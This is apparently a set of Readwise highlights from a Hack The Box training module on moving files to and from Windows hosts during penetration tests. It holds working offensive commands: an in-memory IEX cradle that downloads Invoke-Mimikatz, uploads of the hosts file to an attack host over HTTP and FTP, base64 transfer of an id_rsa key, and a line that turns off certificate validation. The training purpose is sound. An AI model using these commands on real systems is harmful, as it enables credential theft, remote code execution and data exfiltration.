File Transfers - Windows File Transfer Methods

#readwise # File Transfers - Windows File Transfer Methods ![rw-book-cover](https://readwise-assets.s3.amazonaws.com/static/images/article4.6bc1851654a0.png) ## Metadata - Author: [[Hack The Box]] - Full Title: File Transfers - Windows File Transfer Methods ## Summary The text discusses various methods for transferring files using Windows tools. It covers download operations with techniques like PowerShell and FTP. It also explains how to upload files, including using base64 encoding and PowerShell scripts. Overall, it highlights both download and upload strategies for file transfers in Windows. ## Highlights ### PowerShell Base64 Encode & Decode Depending on the file size we want to transfer, we can use different methods that do not require network communication. If we have access to a terminal, we can encode a file to a base64 string, copy its contents from the terminal and perform the reverse operation, decoding the file in the original content. Let's see how we can do this with PowerShell. An essential step in using this method is to ensure the file you encode and decode is correct. We can use [`md5sum`](https://man7.org/linux/man-pages/man1/md5sum.1.html), a program that calculates and verifies 128-bit MD5 checksums. ([View Highlight](https://read.readwise.io/read/01jw0nkdp2p82ytvps9ddr987v)) --- ```sh md5sum id_rsa cat id_rsa | base64 -w 0; echo ``` ([View Highlight](https://read.readwise.io/read/01jw0np0n4sr034kjj0ber5avq)) --- We can confirm if the file was transferred successfully using the [`Get-FileHash`](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/get-filehash?view=powershell-7.2) cmdlet, which does the same thing that `md5sum` does. ([View Highlight](https://read.readwise.io/read/01jw0nqvvtntew52se5cad4exy)) --- ```powershell Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 ``` ([View Highlight](https://read.readwise.io/read/01jw0nr0bk5bzwnaahjr7ptspd)) --- ### Downloading Files Using PowerShell PowerShell offers many file transfer options. In any version of PowerShell, the [System.Net.WebClient](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient?view=net-5.0) class can be used to download a file over `HTTP`, `HTTPS` or `FTP`. The following [table](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient?view=net-6.0) describes WebClient methods for downloading data from a resource: | Method | Description | | ------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------------------------------------------------------------- | | [OpenRead](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openread?view=net-6.0) | Returns the data from a resource as a [Stream](https://docs.microsoft.com/en-us/dotnet/api/system.io.stream?view=net-6.0). | | [OpenReadAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openreadasync?view=net-6.0) | Returns the data from a resource without blocking the calling thread. | | [DownloadData](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddata?view=net-6.0) | Downloads data from a resource and returns a Byte array. | | [DownloadDataAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddataasync?view=net-6.0) | Downloads data from a resource and returns a Byte array without blocking the calling thread. | | [DownloadFile](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-6.0) | Downloads data from a resource to a local file. | | [DownloadFileAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfileasync?view=net-6.0) | Downloads data from a resource to a local file without blocking the calling thread. | | [DownloadString](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-6.0) | Downloads a String from a resource and returns a String. | | [DownloadStringAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstringasync?view=net-6.0) | Downloads a String from a resource without blocking the calling thread. | ([View Highlight](https://read.readwise.io/read/01jw0nt4hf74x8vf4yc2vf00qe)) --- ```powershell (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1') ``` ([View Highlight](https://read.readwise.io/read/01jw0nvbf57t8gw2xp06tf5vw7)) --- As we previously discussed, fileless attacks work by using some operating system functions to download the payload and execute it directly. PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the [Invoke-Expression](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2) cmdlet or the alias `IEX`. ([View Highlight](https://read.readwise.io/read/01jw0nwr5fa79s8zj7zh2reb7k)) --- ```powershell (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX ``` ([View Highlight](https://read.readwise.io/read/01jw0nyhwptqze3ph5eddmkwsp)) --- From PowerShell 3.0 onwards, the [Invoke-WebRequest](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2) cmdlet is also available, but it is noticeably slower at downloading files. You can use the aliases `iwr`, `curl`, and `wget` instead of the `Invoke-WebRequest` full name. ([View Highlight](https://read.readwise.io/read/01jw0nzatq21ax81ekxa8v0nrk)) --- Harmj0y has compiled an extensive list of PowerShell download cradles [here](https://gist.github.com/HarmJ0y/bb48307ffa663256e239). It is worth gaining familiarity with them and their nuances, such as a lack of proxy awareness or touching disk (downloading a file onto the target) to select the appropriate one for the situation. ([View Highlight](https://read.readwise.io/read/01jw0nzys7k7rs33grw131rdde)) --- There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. ... This can be bypassed using the parameter `-UseBasicParsing`. --- Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command: ```powershell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ``` --- ### SMB Downloads The Server Message Block protocol (SMB protocol) that runs on port TCP/445 is common in enterprise networks where Windows services are running. It enables applications and users to transfer files to and from remote servers. We can use SMB to download files from our Pwnbox easily. We need to create an SMB server in our Pwnbox with [smbserver.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py) from Impacket and then use `copy`, `move`, PowerShell `Copy-Item`, or any other tool that allows connection to SMB. ([View Highlight](https://read.readwise.io/read/01jw0p3s3h2pjz6n5dy4nbhcnr)) --- ```sh sudo impacket-smbserver share -smb2support /tmp/smbshare ``` ([View Highlight](https://read.readwise.io/read/01jw0p41bbk9m628krspwkraqq)) --- New versions of Windows block unauthenticated guest access ... To transfer files in this scenario, we can set a username and password using our Impacket SMB server and mount the SMB server on our windows target machine: ^umhyb3 ```sh sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test ``` ^1kz5cb ```powershell net use n: \\192.168.220.133\share /user:test test ``` --- ### FTP Downloads Another way to transfer files is using FTP (File Transfer Protocol), which use port TCP/21 and TCP/20. We can use the FTP client or PowerShell `Net.WebClient` to download files from an FTP server. We can configure an FTP Server in our attack host using Python3 `pyftpdlib` module. ```sh sudo python3 -m pyftpdlib --port 21 ``` ^2t8nng ```sh (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt') ``` --- When we get a shell on a remote machine, we may not have an interactive shell. If that's the case, we can create an FTP command file to download a file. First, we need to create a file containing the commands we want to execute and then use the FTP client to use that file to download that file. ([View Highlight](https://read.readwise.io/read/01jw0pn3c8536ecg3nz31n9dr7)) --- `ftpcommand.txt`: ``` open 192.168.49.128 USER anonymous binary GET file.txt bye ``` ```powershell ftp -v -n -s:ftpcommand.txt ``` ([View Highlight](https://read.readwise.io/read/01jw0pnmch79zfcjyv9sm7ps9g)) --- ### Uploads using Python Web Server PowerShell doesn't have a built-in function for upload operations, but we can use `Invoke-WebRequest` or `Invoke-RestMethod` to build our upload function. We'll also need a web server that accepts uploads, which is not a default option in most common webserver utilities. For our web server, we can use [uploadserver](https://github.com/Densaugeo/uploadserver), an extended module of the Python [HTTP.server module](https://docs.python.org/3/library/http.server.html), which includes a file upload page. ^rt13vy ```sh python3 -m uploadserver ``` ^6l91qs --- Now we can use a PowerShell script [PSUpload.ps1](https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1) which uses `Invoke-RestMethod` to perform the upload operations. The script accepts two parameters `-File`, which we use to specify the file path, and `-Uri`, the server URL where we'll upload our file. Let's attempt to upload the host file from our Windows host. ([View Highlight](https://read.readwise.io/read/01jw0q8xn93fzrawt624v2fe0p)) ^y2zayr --- ```powershell IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts ``` ^n1ne0i ([View Highlight](https://read.readwise.io/read/01jw0qchmh9mphz5q4x4thbzam)) --- ### File Uploads using WebDav An alternative is to run SMB over HTTP with `WebDav`. `WebDAV` [(RFC 4918)](https://datatracker.ietf.org/doc/html/rfc4918) is an extension of HTTP, the internet protocol that web browsers and web servers use to communicate with each other. The `WebDAV` protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. `WebDAV` can also use HTTPS. When you use `SMB`, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP. ([View Highlight](https://read.readwise.io/read/01jw0qfgz724djg6nxdzbf81cd)) --- To set up our WebDav server, we need to install two Python modules, `wsgidav` and `cheroot` (you can read more about this implementation here: [wsgidav github](https://github.com/mar10/wsgidav)). After installing them, we run the `wsgidav` application in the target directory. ([View Highlight](https://read.readwise.io/read/01jw0qg33fknq7hkx80azbf8fr)) --- ```sh sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` ([View Highlight](https://read.readwise.io/read/01jw0qgh9amcay7t12e82031mh)) --- ### File Uploads using FTP Uploading files using FTP is very similar to downloading files. We can use PowerShell or the FTP client to complete the operation. Before we start our FTP Server using the Python module `pyftpdlib`, we need to specify the option `--write` to allow clients to upload files to our attack host. ([View Highlight](https://read.readwise.io/read/01jw0qj48p0r4trw4edsgrt9je)) --- ```sh sudo python3 -m pyftpdlib --port 21 --write ``` ([View Highlight](https://read.readwise.io/read/01jw0qj6x019sdyy5v6nswam30)) --- ```powershell (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` ([View Highlight](https://read.readwise.io/read/01jw0qjemajhs5q7m7x633xchj)) --- `ftpcommand.txt`: ``` open 192.168.49.128 echo USER anonymous binary PUT c:\windows\system32\drivers\etc\hosts bye ``` ```powershell ftp -v -n -s:ftpcommand.txt ``` ([View Highlight](https://read.readwise.io/read/01jw0qjp4g4dn1bcp3vdyb60b7)) ---